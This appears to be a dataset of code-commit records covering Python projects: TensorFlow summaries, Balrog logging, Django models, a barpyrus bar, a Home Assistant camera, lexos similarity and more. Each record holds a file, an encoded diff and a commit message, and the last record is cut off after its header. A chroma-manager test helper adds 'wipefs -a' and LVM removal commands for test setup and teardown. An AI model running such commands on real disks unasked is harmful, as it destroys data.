# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Contains helper functions for creating summaries. This module contains various helper functions for quickly and easily adding tensorflow summaries. These allow users to print summary values automatically as they are computed and add prefixes to collections of summaries. Example usage: import tensorflow as tf slim = tf.contrib.slim slim.summaries.add_histogram_summaries(slim.variables.get_model_variables()) slim.summaries.add_scalar_summary(total_loss, 'Total Loss') slim.summaries.add_scalar_summary(learning_rate, 'Learning Rate') slim.summaries.add_histogram_summaries(my_tensors) slim.summaries.add_zero_fraction_summaries(my_tensors) """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.framework import ops from tensorflow.python.ops import logging_ops from tensorflow.python.ops import nn_impl as nn from tensorflow.python.summary import summary def _get_summary_name(tensor, name=None, prefix=None, postfix=None): """Produces the summary name given. Args: tensor: A variable or op `Tensor`. name: The optional name for the summary. prefix: An optional prefix for the summary name. postfix: An optional postfix for the summary name. Returns: a summary name. """ if not name: name = tensor.op.name if prefix: name = prefix + '/' + name if postfix: name = name + '/' + postfix return name def add_histogram_summary(tensor, name=None, prefix=None): """Adds a histogram summary for the given tensor. Args: tensor: A variable or op tensor. name: The optional name for the summary. prefix: An optional prefix for the summary names. Returns: A scalar `Tensor` of type `string` whose contents are the serialized `Summary` protocol buffer. """ return summary.histogram( _get_summary_name(tensor, name, prefix), tensor) def add_image_summary(tensor, name=None, prefix=None, print_summary=False): """Adds an image summary for the given tensor. Args: tensor: a variable or op tensor with shape [batch,height,width,channels] name: the optional name for the summary. prefix: An optional prefix for the summary names. print_summary: If `True`, the summary is printed to stdout when the summary is computed. Returns: An image `Tensor` of type `string` whose contents are the serialized `Summary` protocol buffer. """ summary_name = _get_summary_name(tensor, name, prefix) # If print_summary, then we need to make sure that this call doesn't add the # non-printing op to the collection. We'll add it to the collection later. collections = [] if print_summary else None op = summary.image( name=summary_name, tensor=tensor, collections=collections) if print_summary: op = logging_ops.Print(op, [tensor], summary_name) ops.add_to_collection(ops.GraphKeys.SUMMARIES, op) return op def add_scalar_summary(tensor, name=None, prefix=None, print_summary=False): """Adds a scalar summary for the given tensor. Args: tensor: a variable or op tensor. name: the optional name for the summary. prefix: An optional prefix for the summary names. print_summary: If `True`, the summary is printed to stdout when the summary is computed. Returns: A scalar `Tensor` of type `string` whose contents are the serialized `Summary` protocol buffer. """ collections = [] if print_summary else None summary_name = _get_summary_name(tensor, name, prefix) # If print_summary, then we need to make sure that this call doesn't add the # non-printing op to the collection. We'll add it to the collection later. op = summary.scalar( name=summary_name, tensor=tensor, collections=collections) if print_summary: op = logging_ops.Print(op, [tensor], summary_name) ops.add_to_collection(ops.GraphKeys.SUMMARIES, op) return op def add_zero_fraction_summary(tensor, name=None, prefix=None, print_summary=False): """Adds a summary for the percentage of zero values in the given tensor. Args: tensor: a variable or op tensor. name: the optional name for the summary. prefix: An optional prefix for the summary names. print_summary: If `True`, the summary is printed to stdout when the summary is computed. Returns: A scalar `Tensor` of type `string` whose contents are the serialized `Summary` protocol buffer. """ name = _get_summary_name(tensor, name, prefix, 'Fraction of Zero Values') tensor = nn.zero_fraction(tensor) return add_scalar_summary(tensor, name, print_summary=print_summary) def add_histogram_summaries(tensors, prefix=None): """Adds a histogram summary for each of the given tensors. Args: tensors: A list of variable or op tensors. prefix: An optional prefix for the summary names. Returns: A list of scalar `Tensors` of type `string` whose contents are the serialized `Summary` protocol buffer. """ summary_ops = [] for tensor in tensors: summary_ops.append(add_histogram_summary(tensor, prefix=prefix)) return summary_ops def add_image_summaries(tensors, prefix=None): """Adds an image summary for each of the given tensors. Args: tensors: A list of variable or op tensors. prefix: An optional prefix for the summary names. Returns: A list of scalar `Tensors` of type `string` whose contents are the serialized `Summary` protocol buffer. """ summary_ops = [] for tensor in tensors: summary_ops.append(add_image_summary(tensor, prefix=prefix)) return summary_ops def add_scalar_summaries(tensors, prefix=None, print_summary=False): """Adds a scalar summary for each of the given tensors. Args: tensors: a list of variable or op tensors. prefix: An optional prefix for the summary names. print_summary: If `True`, the summary is printed to stdout when the summary is computed. Returns: A list of scalar `Tensors` of type `string` whose contents are the serialized `Summary` protocol buffer. """ summary_ops = [] for tensor in tensors: summary_ops.append(add_scalar_summary(tensor, prefix=prefix, print_summary=print_summary)) return summary_ops def add_zero_fraction_summaries(tensors, prefix=None): """Adds a scalar zero-fraction summary for each of the given tensors. Args: tensors: a list of variable or op tensors. prefix: An optional prefix for the summary names. Returns: A list of scalar `Tensors` of type `string` whose contents are the serialized `Summary` protocol buffer. """ summary_ops = [] for tensor in tensors: summary_ops.append(add_zero_fraction_summary(tensor, prefix=prefix)) return summary_ops
Python
0.000012
@@ -5223,17 +5223,17 @@ tion - of +_of_ Zero - +_ Valu
40eb7ede3a223ec89c28a43abb8d626027e2dc12
Fix logging message omission. (#1022)
auslib/log.py
auslib/log.py
import json import logging import socket import sys import traceback from flask import request log_format = "%(asctime)s - %(levelname)s - PID: %(process)s - Request: %(requestid)s - %(name)s.%(funcName)s#%(lineno)s: %(message)s" class BalrogLogger(logging.Logger): def makeRecord(self, name, level, fn, lno, msg, args, exc_info, func=None, extra=None, sinfo=None): if extra is None: extra = {} if "requestid" not in extra: # Not all logging will be done from within a request # (eg, initial logging at start up). We need to be able to cope # with that. requestid = "None" try: # "request" is a proxy object that passes along operations # to the real object. _get_current_object gives us the true # Request object, whose id is actually what we want. # Without this we end up with the id of the proxy object, which # is static for the life of the application. # TODO: this doesn't seem to be 100% unique. # Sometimes requests that happen around the same time will # end up with the same value here. Possibly only when the # query strings are the same, or srcip? requestid = str(id(request._get_current_object())) # RuntimeError will be raised if there's no active request. except RuntimeError: pass extra["requestid"] = requestid return logging.Logger.makeRecord(self, name, level, fn, lno, msg, args, exc_info, func, extra, sinfo) # pragma: no cover class JsonLogFormatter(logging.Formatter): """Log formatter that outputs machine-readable json. This log formatter outputs JSON format messages that are compatible with Mozilla's standard heka-based log aggregation infrastructure. See also: https://mana.mozilla.org/wiki/display/CLOUDSERVICES/Logging+Standard https://mana.mozilla.org/wiki/pages/viewpage.action?pageId=42895640 Adapted from: https://github.com/mozilla-services/mozservices/blob/master/mozsvc/util.py#L106 """ LOGGING_FORMAT_VERSION = "2.0" # Map from Python logging to Syslog severity levels SYSLOG_LEVEL_MAP = {logging.DEBUG: 2, logging.ERROR: 3, logging.WARNING: 4, logging.INFO: 6, logging.DEBUG: 7} # Syslog level to use when/if python level isn't found in map DEFAULT_SYSLOG_LEVEL = 7 EXCLUDED_LOGRECORD_ATTRS = set( ( "args", "asctime", "created", "exc_info", "exc_text", "filename", "funcName", "levelname", "levelno", "lineno", "module", "msecs", "message", "msg", "name", "pathname", "process", "processName", "relativeCreated", "stack_info", "thread", "threadName", ) ) def __init__(self, fmt=None, datefmt=None, logger_name="Balrog"): self.logger_name = logger_name self.hostname = socket.gethostname() logging.Formatter.__init__(self, fmt, datefmt) def format(self, record): """ Map from Python LogRecord attributes to JSON log format fields * from - https://docs.python.org/3/library/logging.html#logrecord-attributes * to - https://mana.mozilla.org/wiki/pages/viewpage.action?pageId=42895640 """ out = dict( Timestamp=int(record.created * 1e9), Type=record.name, Logger=self.logger_name, Hostname=self.hostname, EnvVersion=self.LOGGING_FORMAT_VERSION, Severity=self.SYSLOG_LEVEL_MAP.get(record.levelno, self.DEFAULT_SYSLOG_LEVEL), Pid=record.process, ) # Include any custom attributes set on the record. # These would usually be collected metrics data. fields = dict() for key, value in record.__dict__.items(): if key not in self.EXCLUDED_LOGRECORD_ATTRS: fields[key] = value # Only include the 'message' key if it has useful content # and is not already a JSON blob. message = record.getMessage() if message: if not message.startswith("{") and not message.endswith("}"): fields["message"] = message # If there is an error, format it for nice output. if record.exc_info is not None: fields["error"] = repr(record.exc_info[1]) fields["traceback"] = safer_format_traceback(*record.exc_info) out["Fields"] = fields return json.dumps(out) def safer_format_traceback(exc_typ, exc_val, exc_tb): """Format an exception traceback into safer string. We don't want to let users write arbitrary data into our logfiles, which could happen if they e.g. managed to trigger a ValueError with a carefully-crafted payload. This function formats the traceback using "%r" for the actual exception data, which passes it through repr() so that any special chars are safely escaped. """ lines = ["Uncaught exception:\n"] lines.extend(traceback.format_tb(exc_tb)) lines.append("%r\n" % (exc_typ,)) lines.append("%r\n" % (exc_val,)) return "".join(lines) def configure_logging(stream=sys.stdout, formatter=JsonLogFormatter, format_=log_format, level=logging.DEBUG): logging.setLoggerClass(BalrogLogger) handler = logging.StreamHandler(stream) formatter = formatter(fmt=format_) handler.setFormatter(formatter) logging.root.addHandler(handler) logging.root.setLevel(level)
Python
0.003285
@@ -4417,19 +4417,18 @@ th(%22%7B%22) -and +or not mes
7755c117e354871bbc06c98d0709545cee2032ba
Add versioning managers
share/models/base.py
share/models/base.py
import uuid import inspect from django.db import models from django.conf import settings from django.db import transaction from django.db.models.base import ModelBase from django.db.models.fields.related import lazy_related_operation from share.models.core import RawData from share.models.core import ShareUser class AbstractShareObject(models.Model): # id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) source = models.ForeignKey(ShareUser) source_data = models.ForeignKey(RawData, blank=True, null=True) # NULL/None indicates a user submitted change changed_at = models.DateTimeField(auto_now=True) created_at = models.DateTimeField(auto_now=True) class Meta: abstract = True class ShareObjectVersion(models.Model): action = models.CharField(max_length=10); persistant_id = models.PositiveIntegerField() # Must match the id of ShareObject class Meta: abstract = True class ShareForeignKey(models.ForeignKey): def __init__(self, model, **kwargs): self.__kwargs = kwargs super().__init__(model, **kwargs) def contribute_to_class(self, cls, name, **kwargs): actual = self.__class__.mro()[1](self.remote_field.model, **self.__kwargs) actual.contribute_to_class(cls, name, **kwargs) self.__kwargs['editable'] = False version = self.__class__.mro()[1](self.remote_field.model.VersionModel, **self.__kwargs) version.contribute_to_class(cls, name + '_version', **kwargs) class ShareManyToMany(models.ManyToManyField): def __init__(self, model, **kwargs): self.__kwargs = kwargs super().__init__(model, **kwargs) def contribute_to_class(self, cls, name, **kwargs): actual = self.__class__.mro()[1](self.remote_field.model, **self.__kwargs) actual.contribute_to_class(cls, name, **kwargs) self.__kwargs['through'] += 'Version' self.__kwargs['editable'] = False version = self.__class__.mro()[1](self.remote_field.model.VersionModel, **self.__kwargs) version.contribute_to_class(cls, name[:-1] + '_versions', **kwargs) class ShareObjectMeta(ModelBase): def __new__(cls, name, bases, attrs): if models.Model in bases or len(bases) > 1: return super(ShareObjectMeta, cls).__new__(cls, name, bases, attrs) module = attrs['__module__'] if not attrs.get('Meta'): attrs['Meta'] = type('Meta', (object, ), {}) attrs['Meta'].abstract = True attrs['__qualname__'] = 'Abstract' + attrs['__qualname__'] abstract = super(ShareObjectMeta, cls).__new__(cls, 'Abstract' + name, (AbstractShareObject, ), attrs) version = type( name + 'Version', (abstract, ShareObjectVersion), {'__module__': module} ) concrete = super(ShareObjectMeta, cls).__new__(cls, name, (abstract, ShareObject), { '__module__': module, 'version': models.OneToOneField(version, on_delete=models.PROTECT, related_name='%(app_label)s_%(class)s_version') }) concrete.VersionModel = version inspect.stack()[1].frame.f_globals.update({concrete.VersionModel.__name__: concrete.VersionModel}) return concrete class ShareObject(models.Model, metaclass=ShareObjectMeta): id = models.AutoField(primary_key=True) class Meta: abstract = True
Python
0
@@ -686,24 +686,28 @@ eld(auto_now +_add =True)%0A%0A @@ -949,32 +949,69 @@ abstract = True%0A + ordering = ('-changed_at', )%0A %0A%0Aclass ShareFor @@ -3010,16 +3010,53 @@ module,%0A + 'VersionModel': version,%0A @@ -3198,49 +3198,8 @@ -concrete.VersionModel = version%0A%0A insp @@ -3317,16 +3317,932 @@ concrete +%0A%0A%0Aclass VersionManagerDescriptor:%0A%0A def __init__(self, model):%0A self.model = model%0A%0A def __get__(self, instance, type=None):%0A if instance is not None:%0A return VersionManager(self.model, instance)%0A return VersionManager(self.model, instance)%0A%0Aclass VersionManager(models.Manager):%0A%0A def __init__(self, model=None, instance=None):%0A super().__init__()%0A self.model = model%0A self.instance = instance%0A%0A def get_queryset(self):%0A qs = self._queryset_class(model=self.model.VersionModel, using=self._db, hints=self._hints).order_by('-changed_at')%0A if self.instance:%0A return qs.filter(persistant_id=self.instance.id)%0A return qs%0A%0A def contribute_to_class(self, model, name):%0A super().contribute_to_class(model, name)%0A if not model._meta.abstract:%0A setattr(model, name, VersionManagerDescriptor(model)) %0A%0A%0Aclass @@ -4335,24 +4335,87 @@ ry_key=True) +%0A objects = models.Manager()%0A versions = VersionManager() %0A%0A class
0ef0e6c1d130dd25ec9dd9618ffcfc9f85913137
Add dock interface
barpyrus.py
barpyrus.py
import sys import contextlib from barpyrus import hlwm from barpyrus import widgets as W from barpyrus.core import Theme, Painter from barpyrus import lemonbar from barpyrus import conky @contextlib.contextmanager def maybe_orange(match, predicate='> 90'): with cg.if_('match ${%s} %s' % (match, predicate)): cg.fg('#ffc726') yield cg.fg(None) def underlined_tags(taginfo, painter): if taginfo.empty: return painter.set_flag(painter.underline, True if taginfo.visible else False) painter.fg('#a0a0a0' if taginfo.occupied else '#909090') if taginfo.urgent: painter.ol('#FF7F27') painter.fg('#FF7F27') painter.set_flag(Painter.underline, True) painter.bg('#57000F') elif taginfo.here: painter.fg('#ffffff') painter.ol(taginfo.activecolor if taginfo.focused else '#ffffff') painter.bg(taginfo.emphbg) else: painter.ol('#454545') painter.space(3) painter += taginfo.name painter.space(3) painter.bg() painter.ol() painter.set_flag(painter.underline, False) painter.space(2) hc = hlwm.connect() monitor = sys.argv[1] if len(sys.argv) >= 2 else 0 x, y, monitor_w, monitor_h = hc.monitor_rect(monitor) height = 16 width = monitor_w hc(['pad', str(monitor), str(height)]) cg = conky.ConkyGenerator(lemonbar.textpainter()) ## CPU / RAM / df with cg.temp_fg('#9fbc00'): cg.symbol(0xe026) cg.space(5) for cpu in '1234': with maybe_orange('cpu cpu%s' % cpu): cg.var('cpu cpu' + cpu) cg.text('% ') with cg.temp_fg('#9fbc00'): cg.symbol(0xe021) cg.space(5) with maybe_orange('memperc'): cg.var('memperc') cg.text('% ') with cg.temp_fg('#9fbc00'): cg.symbol(0x00e1bb) cg.space(5) with maybe_orange('fs_used_perc /'): cg.var('fs_used_perc /') cg.text('% ') ## Network wifi_icons = [0xe217, 0xe218, 0xe219, 0xe21a] wifi_delta = 100 / len(wifi_icons) with cg.if_('up tun0'): with cg.temp_fg('#ff0000'): cg.symbol(0xe0a6) for iface in ['eth', 'wlan', 'ppp0']: with cg.if_('up %s' % iface), cg.if_('match "${addr %s}" != "No Address"' % iface): with cg.temp_fg('#9fbc00'): if iface == 'wlan': with cg.cases(): for i, icon in enumerate(wifi_icons[:-1]): cg.case('match ${wireless_link_qual_perc wlan} < %d' % ((i+1)*wifi_delta)) cg.symbol(icon) cg.else_() cg.symbol(wifi_icons[-1]) # icon for 100 percent cg.space(5) elif iface == 'eth': cg.symbol(0xe0af) elif iface == 'ppp0': cg.symbol(0xe0f3) else: assert False if iface == 'wlan': cg.var('wireless_essid') if iface != 'ppp0': cg.space(5) cg.var('addr %s' % iface) cg.space(5) with cg.temp_fg('#9fbc00'): cg.symbol(0xe13c) cg.var('downspeedf %s' % iface) cg.text('K ') cg.var('totaldown %s' % iface) cg.space(5) with cg.temp_fg('#9fbc00'): cg.symbol(0xe13b) cg.var('upspeedf %s' % iface) cg.text('K ') cg.var('totalup %s' % iface) cg.space(5) ## Battery # first icon: 0 percent # last icon: 100 percent bat_icons = [ 0xe242, 0xe243, 0xe244, 0xe245, 0xe246, 0xe247, 0xe248, 0xe249, 0xe24a, 0xe24b, ] bat_delta = 100 / len(bat_icons) with cg.if_('existing /sys/class/power_supply/BAT0'): cg.fg('#9fbC00') with cg.if_('match "$battery" != "discharging $battery_percent%"'): cg.symbol(0xe0db) with cg.cases(): for i, icon in enumerate(bat_icons[:-1]): cg.case('match $battery_percent < %d' % ((i+1)*bat_delta)) cg.symbol(icon) cg.else_() cg.symbol(bat_icons[-1]) # icon for 100 percent cg.fg(None) cg.space(5) with maybe_orange('battery_percent', '< 10'): cg.var('battery_percent') cg.text('% ') cg.var('battery_time') cg.space(5) with cg.temp_fg('#9fbc00'): cg.symbol(0xe015) cg.space(5) cg.var('time %d. %B, %H:%M') conky_config = { 'update_interval': '5', } # Widget configuration: bar = lemonbar.Lemonbar(geometry = (x,y,width,height)) bar.widget = W.ListLayout([ W.RawLabel('%{l}'), hlwm.HLWMTags(hc, monitor, tag_renderer=underlined_tags), W.RawLabel('%{c}'), hlwm.HLWMWindowTitle(hc), W.RawLabel('%{r}'), conky.ConkyWidget(text=str(cg), config=conky_config), ])
Python
0
@@ -2037,16 +2037,24 @@ %5B'eth', + 'dock', 'wlan', @@ -2611,16 +2611,26 @@ ace -== +in %5B 'eth' +, 'dock'%5D :%0A
bc4a37e3a93a68fa76c47bd355e1b028f0ca6c60
fix skynetqa url, add timeout and more graceful error handling
daft/scorebig/action.py
daft/scorebig/action.py
__author__ = 'bkeroack' import logging import ec2 import salt.client import requests import re class QualType: Corp = 0 EC2 = 1 CorpMaster = 'laxqualmaster' EC2Master = 'qualmaster001' class QualTypeUnknown(Exception): pass class UploadBuildAction: def __init__(self, **kwargs): #pattern match for prod Skynet registration self.rx = re.compile("^[0-9]{1,8}-(master|develop|sprint).*") self.build_name = kwargs['build_name'] def go(self): ret = True if self.rx.match(self.build_name): logging.debug("UploadBuildAction: regexp matches: {}".format(self.build_name)) ret = RegisterBuildSkynet(self.build_name).register() return ret and RegisterBuildSkynetQA(self.build_name).register() class RegisterBuild: def __init__(self, url, build_name): self.url = url self.build_name = build_name def register(self): url = self.url.format(self.build_name) logging.debug("ScoreBig: Action: {}: url: {}".format(self.__class__.__name__, url)) r = requests.post(url) resp = str(r.text).encode('ascii', 'ignore') logging.debug("ScoreBig: Action: {}: response: {}".format(self.__class__.__name__, resp)) logging.debug("ScoreBIg: Action: {}: encoding: {}".format(self.__class__.__name__, r.encoding)) return "ok" in resp class RegisterBuildSkynet(RegisterBuild): def __init__(self, build_name): url = "http://skynet.scorebiginc.com/Hacks/RegisterBuild?buildNumber={}" RegisterBuild.__init__(self, url, build_name) class RegisterBuildSkynetQA(RegisterBuild): def __init__(self, build_name): #url = "http://skynetqa.scorebiginc.com/DevQaTools/RegisterBuild?buildNumber={}" url = "http://laxsky001/DevQaTools/RegisterBuild?buildNumber={}" RegisterBuild.__init__(self, url, build_name) class ProvisionQual: def __init__(self, qual_type, build): self.qual_type = qual_type self.build = build assert self.build.__class__.__name__ == 'Build' def start(self): self.verify_master_server() self.copy_build() self.shut_down_master() self.take_snapshot() self.create_qual() self.setup_qual() self.setup_dns() # generic master server: # - verify up # - copy build over # - (shut down - optional?) # generic snapshot: # - take snapshot of build volume # generic new server: # - create new server based on generic server image (ami/vhd) # loop on creation until up # generic uptime tasks: # - IIS bindings # - service start # - bootstrapping # generic DNS # - create DNS A record class SaltClient: def __init__(self): self.client = salt.client.LocalClient() def powershell(self, target, cmd, target_type='glob', timeout=120): return self.client.cmd(target, 'cmd.run', cmd, timeout=timeout, expr_form=target_type, shell='powershell') def cmd(self, target, cmd, args, target_type='glob', timeout=60): return self.client.cmd(target, cmd, args, timeout=timeout, expr_form=target_type) def ping(self, target): return
Python
0
@@ -1070,16 +1070,33 @@ , url))%0A + try:%0A @@ -1116,17 +1116,153 @@ post(url -) +, timeout=45)%0A except requests.ConnectionError:%0A return False%0A except requests.Timeout:%0A return False %0A @@ -1842,17 +1842,16 @@ -# url = %22h @@ -1922,32 +1922,33 @@ ber=%7B%7D%22%0A +# url = %22http://la
588fb283cc82be28d3fb28bb6a8896c42d1a7eee
Fix the CONF_LOOP check to use the config (#38890)
homeassistant/components/environment_canada/camera.py
homeassistant/components/environment_canada/camera.py
"""Support for the Environment Canada radar imagery.""" import datetime import logging from env_canada import ECRadar import voluptuous as vol from homeassistant.components.camera import PLATFORM_SCHEMA, Camera from homeassistant.const import ( ATTR_ATTRIBUTION, CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME, ) import homeassistant.helpers.config_validation as cv from homeassistant.util import Throttle _LOGGER = logging.getLogger(__name__) ATTR_UPDATED = "updated" CONF_ATTRIBUTION = "Data provided by Environment Canada" CONF_STATION = "station" CONF_LOOP = "loop" CONF_PRECIP_TYPE = "precip_type" MIN_TIME_BETWEEN_UPDATES = datetime.timedelta(minutes=10) PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Optional(CONF_LOOP, default=True): cv.boolean, vol.Optional(CONF_NAME): cv.string, vol.Optional(CONF_STATION): cv.matches_regex(r"^C[A-Z]{4}$|^[A-Z]{3}$"), vol.Inclusive(CONF_LATITUDE, "latlon"): cv.latitude, vol.Inclusive(CONF_LONGITUDE, "latlon"): cv.longitude, vol.Optional(CONF_PRECIP_TYPE): ["RAIN", "SNOW"], } ) def setup_platform(hass, config, add_devices, discovery_info=None): """Set up the Environment Canada camera.""" if config.get(CONF_STATION): radar_object = ECRadar( station_id=config[CONF_STATION], precip_type=config.get(CONF_PRECIP_TYPE) ) else: lat = config.get(CONF_LATITUDE, hass.config.latitude) lon = config.get(CONF_LONGITUDE, hass.config.longitude) radar_object = ECRadar( coordinates=(lat, lon), precip_type=config.get(CONF_PRECIP_TYPE) ) add_devices([ECCamera(radar_object, config.get(CONF_NAME))], True) class ECCamera(Camera): """Implementation of an Environment Canada radar camera.""" def __init__(self, radar_object, camera_name): """Initialize the camera.""" super().__init__() self.radar_object = radar_object self.camera_name = camera_name self.content_type = "image/gif" self.image = None self.timestamp = None def camera_image(self): """Return bytes of camera image.""" self.update() return self.image @property def name(self): """Return the name of the camera.""" if self.camera_name is not None: return self.camera_name return "Environment Canada Radar" @property def device_state_attributes(self): """Return the state attributes of the device.""" attr = {ATTR_ATTRIBUTION: CONF_ATTRIBUTION, ATTR_UPDATED: self.timestamp} return attr @Throttle(MIN_TIME_BETWEEN_UPDATES) def update(self): """Update radar image.""" if CONF_LOOP: self.image = self.radar_object.get_loop() else: self.image = self.radar_object.get_latest_frame() self.timestamp = self.radar_object.timestamp
Python
0
@@ -1645,16 +1645,25 @@ devices( +%0A %5BECCamer @@ -1703,16 +1703,35 @@ AME) +, config%5BCONF_LOOP%5D )%5D, True )%0A%0A%0A @@ -1726,16 +1726,21 @@ )%5D, True +%0A )%0A%0A%0Aclas @@ -1872,16 +1872,25 @@ era_name +, is_loop ):%0A @@ -1990,16 +1990,16 @@ _object%0A - @@ -2021,32 +2021,63 @@ e = camera_name%0A + self.is_loop = is_loop%0A self.con @@ -2798,25 +2798,28 @@ if -CONF_LOOP +self.is_loop :%0A
c96cccbe7afc282aedbb316a2e9e41e47e68bcb6
fix efs lvm create (#610)
chroma-manager/tests/integration/utils/test_blockdevices/test_blockdevice_lvm.py
chroma-manager/tests/integration/utils/test_blockdevices/test_blockdevice_lvm.py
# Copyright (c) 2017 Intel Corporation. All rights reserved. # Use of this source code is governed by a MIT-style # license that can be found in the LICENSE file. import re from tests.integration.utils.test_blockdevices.test_blockdevice import TestBlockDevice class TestBlockDeviceLvm(TestBlockDevice): _supported_device_types = ['lvm'] def __init__(self, device_type, device_path): super(TestBlockDeviceLvm, self).__init__(device_type, device_path) @property def preferred_fstype(self): return 'ldiskfs' # Create a lvm on the device. @property def prepare_device_commands(self): # FIXME: the use of --yes in the {vg,lv}create commands is a work-around for #500 # and should be reverted when #500 is fixed return [ "vgcreate --yes %s %s; lvcreate --yes --wipesignatures n -l 100%%FREE --name %s %s" % (self.vg_name, self._device_path, self.lv_name, self.vg_name) ] @property def vg_name(self): return "vg_%s" % "".join( [c for c in self._device_path if re.match(r'\w', c)]) @property def lv_name(self): return "lv_%s" % "".join( [c for c in self._device_path if re.match(r'\w', c)]) @property def device_path(self): return "/dev/%s/%s" % (self.vg_name, self.lv_name) @classmethod def clear_device_commands(cls, device_paths): lv_destroy = [ "if lvdisplay /dev/{0}/{1}; then lvchange -an /dev/{0}/{1} && lvremove /dev/{0}/{1}; else exit 0; fi". format( TestBlockDeviceLvm('lvm', device_path).vg_name, TestBlockDeviceLvm('lvm', device_path).lv_name) for device_path in device_paths ] vg_destroy = [ "if vgdisplay {0}; then vgremove {0}; else exit 0; fi".format( TestBlockDeviceLvm('lvm', device_path).vg_name) for device_path in device_paths ] return lv_destroy + vg_destroy @property def install_packages_commands(self): return []
Python
0
@@ -783,16 +783,70 @@ eturn %5B%0A + %22wipefs -a %7B%7D%22.format(self._device_path),%0A
64b225f64a26cacff5609d2c2083a4f7f406a2c3
complete bug fix
lexos/models/similarity_model.py
lexos/models/similarity_model.py
from typing import Optional import numpy as np import pandas as pd from sklearn.metrics.pairwise import cosine_similarity from lexos.models.base_model import BaseModel from lexos.helpers.error_messages import NON_NEGATIVE_INDEX_MESSAGE from lexos.models.matrix_model import MatrixModel from lexos.receivers.matrix_receiver import IdTempLabelMap from lexos.receivers.similarity_receiver import SimilarityOption, \ SimilarityReceiver class SimilarityModel(BaseModel): def __init__(self, test_dtm: Optional[pd.DataFrame] = None, test_option: Optional[SimilarityOption] = None, test_id_temp_label_map: Optional[IdTempLabelMap] = None): """This is the class to generate similarity. :param test_dtm: (fake parameter) the doc term matrix used for testing. :param test_option: (fake parameter) the similarity option used for testing. :param test_id_temp_label_map: (fake parameter) the id temp label map used for testing. """ super().__init__() self._test_dtm = test_dtm self._test_option = test_option self._test_id_temp_label_map = test_id_temp_label_map @property def _doc_term_matrix(self) -> pd.DataFrame: """:return: the document term matrix.""" return self._test_dtm if self._test_dtm is not None \ else MatrixModel().get_matrix() @property def _id_temp_label_map(self) -> IdTempLabelMap: """:return: a map takes an id to temp labels.""" return self._test_id_temp_label_map \ if self._test_id_temp_label_map is not None \ else MatrixModel().get_temp_label_id_map() @property def _similarity_option(self) -> SimilarityOption: """:return: the similarity option.""" return self._test_option if self._test_option is not None \ else SimilarityReceiver().options_from_front_end() def _similarity_maker(self) -> pd.DataFrame: """this function generate the result of cos-similarity between files :return: docs_score: a parallel list with `docs_name`, is an array of the cos-similarity distance :return: docs_name: a parallel list with `docs_score`, is an array of the name (temp labels) """ # precondition assert self._similarity_option.comp_file_id >= 0, \ NON_NEGATIVE_INDEX_MESSAGE # get labels labels = [self._id_temp_label_map[file_id] for file_id in self._doc_term_matrix.index.values] # get cosine_similarity dist = 1 - cosine_similarity(self._doc_term_matrix.values) # get an array of file index in file manager files other_file_indexes = np.where(self._doc_term_matrix.index != self._similarity_option.comp_file_id)[0] select_file_indexes = np.where(self._doc_term_matrix.index == self._similarity_option.comp_file_id)[0] # construct an array of scores Test = [dist[file_index, select_file_indexes] for file_index in other_file_indexes] docs_score_array = np.asarray( [dist[file_index, select_file_indexes] for file_index in other_file_indexes]) # construct an array of names compared_file_label = np.asarray( [self._id_temp_label_map[file_id] for file_id in self._doc_term_matrix.index.values if file_id != self._similarity_option.comp_file_id]) docs_name_array = np.asarray([labels[i] for i in list(other_file_indexes)]) # sort the score array sorted_score_array = np.sort(docs_score_array) # round the score array to 4 decimals final_score_array = np.round(sorted_score_array, decimals=4) # sort the name array in terms of the score array sorted_score_array_index = docs_score_array.argsort() final_name_array = docs_name_array[sorted_score_array_index] sorted_compared_file_label = compared_file_label[sorted_score_array_index] # pack the scores and names in data_frame score_name_data_frame = pd.DataFrame(final_score_array, index=final_name_array, columns=["Cosine similarity"]) return score_name_data_frame def get_similarity_score(self) -> pd.DataFrame: return self._similarity_maker()
Python
0
@@ -2531,150 +2531,8 @@ GE%0A%0A - # get labels%0A labels = %5Bself._id_temp_label_map%5Bfile_id%5D%0A for file_id in self._doc_term_matrix.index.values%5D%0A%0A @@ -2645,79 +2645,64 @@ get -an array of file index in file manager files%0A other_file +index of selected file in the DTM%0A selected _index -es = n @@ -2741,15 +2741,11 @@ dex -! += =%0A - @@ -2814,16 +2814,20 @@ e_id)%5B0%5D +%5B0%5D%0A %0A @@ -2827,27 +2827,69 @@ -select_file +# get an array of compared file indexes%0A other _indexes @@ -2924,33 +2924,27 @@ atrix.index -= +! =%0A - @@ -3057,15 +3057,38 @@ -Test = +docs_score_array = np.asarray( %5Bdis @@ -3103,37 +3103,32 @@ ndex, select -_fil e +d _index -es %5D%0A @@ -3134,136 +3134,21 @@ -for file_index in other_file_indexes%5D%0A docs_score_array = np.asarray(%0A %5Bdist%5Bfile_index, select_file_indexes%5D%0A + @@ -3176,29 +3176,24 @@ ex in other_ -file_ indexes%5D)%0A%0A @@ -3256,16 +3256,17 @@ le_label +s = np.as @@ -3451,216 +3451,8 @@ d%5D)%0A - docs_name_array = np.asarray(%5Blabels%5Bi%5D%0A for i in list(other_file_indexes)%5D)%0A%0A # sort the score array%0A sorted_score_array = np.sort(docs_score_array)%0A %0A @@ -3457,16 +3457,25 @@ # + sort and round t @@ -3492,22 +3492,8 @@ rray - to 4 decimals %0A @@ -3526,22 +3526,28 @@ p.round( +np. sort -ed +(docs _score_a @@ -3550,16 +3550,17 @@ re_array +) , decima @@ -3600,230 +3600,93 @@ ray -in terms of the score array%0A sorted_score_array_index = docs_score_array.argsort()%0A final_name_array = docs_name_array%5Bsorted_score_array_index%5D%0A sorted_compared_file_label = compared_file_label%5Bsorted +to correctly map the score array%0A final_name_array = compared_file_labels%5Bdocs _sco @@ -3693,22 +3693,26 @@ re_array -_index +.argsort() %5D%0A%0A @@ -4055,17 +4055,16 @@ aFrame:%0A -%0A
d0e75c65505713a5f044d67a08e6697c4e332611
Add djangobower and update static settings
darts/darts/settings.py
